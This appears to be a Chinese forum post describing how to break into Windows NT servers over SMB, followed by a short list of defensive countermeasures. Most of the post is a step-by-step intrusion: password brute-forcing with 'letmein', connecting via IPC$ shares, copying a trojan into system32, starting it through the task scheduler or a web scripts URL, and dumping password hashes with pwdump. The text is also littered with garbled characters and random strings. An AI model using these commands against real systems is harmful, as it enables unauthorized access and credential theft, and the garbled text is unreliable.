看了篇文章介紹使用netbus 或 netspy 遠程入侵nt系統(tǒng)����,感覺真是。�。看來nt系統(tǒng)的共享機制如果不配合火墻使用�����,SMB會給你造成很大麻煩���。�����?!∵B小小 只的木馬都可以讓nt管理員頭大。 + `% u; y8 x& h8 Z$ C- q
其攻擊過程如下:
# p6 \3 ^& J/ }$ O: k1��、使用掃描工具查找NT主機 , r- {/ x7 l F$ Z8 @6 x, x
2 ����、確定攻擊目標后,使用letmein 對目標主機進行攻擊�����, 如:
M; D. F0 B1 A) O) A' cletmein file://x.x.x.x/ -all -g mypwd (對\\x.x.x.x上所有用戶攻擊) , f' H$ `2 k; [ n5 }- Z2 k
letmein file://x.x.x.x/ -admin -g mypwd (對\\x.x.x.x上管理員攻擊)
9 S! t, Q: Q% {! e7 M) qletmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶) 9 S. o! K) D7 F4 Q. ]' s
注:- 確定目標后��,收集目標信息并嘗試取得非法資源
1 S" p# U+ g) i2 j" o1 Y/ U3���、當letmein 獲取相關(guān)管理員權(quán)限后�����,使用ms提供的合法命令: / h/ [: y: C* S
net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠程資源并將木馬拷入遠程
" |) V* P" Q- a) I$ G1 s7 C1 wcopy x:\netserver.exe \\x.x.x.x\admin$\system32
( V* p# K" A+ k9 A4 [7 v4���、使用合法ms命令遠程啟動木馬服務(wù):
- @/ I( @. a8 p9 ]- p$ D" ^netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg g8 M$ t, v1 p% h( X- a n
' ~) z# f9 S6 G+ B( H% f
該方法有其巧妙之處。。利用nt的任務(wù)計劃管理��,在特定時候啟動木馬服務(wù)
- F/ O- H0 o! _' u5 z
9 W ]( [5 N' z) N$ |. A 另一種方法:
5 b; [3 `# {8 `# E9 a+ M 將ntsrver.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄����, 如cgi-bin或scripts��,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動: O4 h( o% H! k$ Q0 L
+ m$ ^+ a' H7 y0 Q
到此��,該次攻擊可以算成功了����,遠程資源已在別人控制下。
8 C/ u4 T; u/ {6 @- w 如果在遠程使用app redirect 啟動一個cmd.exe到特定端口 , 那么你可以telnet 到該端口��,更方便使用該遠程資源 ��。比如:使用pwdump 將遠程nt上所有用戶和密碼 dump成文件��,回傳本地����,使用其他工具如l0phtcrack來運算。 分析該次攻擊的整體過程����,不難看出��,關(guān)鍵步驟是letmein取得admin權(quán)限�,但是很不幸���,就目前廈門(有些是省內(nèi))的nt服務(wù)器管理員而言�,密碼對letmein只是多花幾分鐘而已����。我對某些大的公共平臺服務(wù)器進行掃描的結(jié)果,除了solaris和linux系統(tǒng)之外�,其余的nt被letmein猜中率有75%以上。而且在這些被進入的機器上����,SMB都有在tcp/ip上 跑,有兩臺有配備火墻�,但是沒有封閉對外137-139口。
( ?3 D7 R3 e5 W0 n' y$ H$ F" t4 _
對策:
: Q" G2 S; F0 E1�、還是老話,密碼的選擇問題�,使用向..@2KjsfiM7v!09..這樣的密碼會讓任何使用 暴力法計算的機器算到cpu燒掉。
0 H& Z! E L! ?+ A3 ]! B2��、nt網(wǎng)絡(luò)的適當配置,不要在對外的nc綁定共享服務(wù)是個好習(xí)慣����,特別是tcp/ip協(xié)議。 3 x/ o' e. w- r$ x( {1 A
3��、防火墻的配置��,屏蔽一切不需要的服務(wù)端口��,象netebui在tcp/ip上的137-139口��,開這些口只會使你的系統(tǒng)處于危險的處境����,如果非要在遠程使用這些口的服務(wù)����,建議使用其他軟件來代替。
' j4 K& `9 x" n8 x+ e/ w4��、及時檢查日記和監(jiān)控服務(wù)的運行��,定時對文件系統(tǒng)的權(quán)限受托關(guān)系進行檢查���。 a) {" |( J% r# J: ]
5�、管理人員素質(zhì)的提高,安全風(fēng)險意思加強無疑對你管理的系統(tǒng)有很多好處��。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時不刻在影響著你 ���。
3 S: L& P0 J- u& A0 { |
發(fā)表于 2011-1-12 16:31:02
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡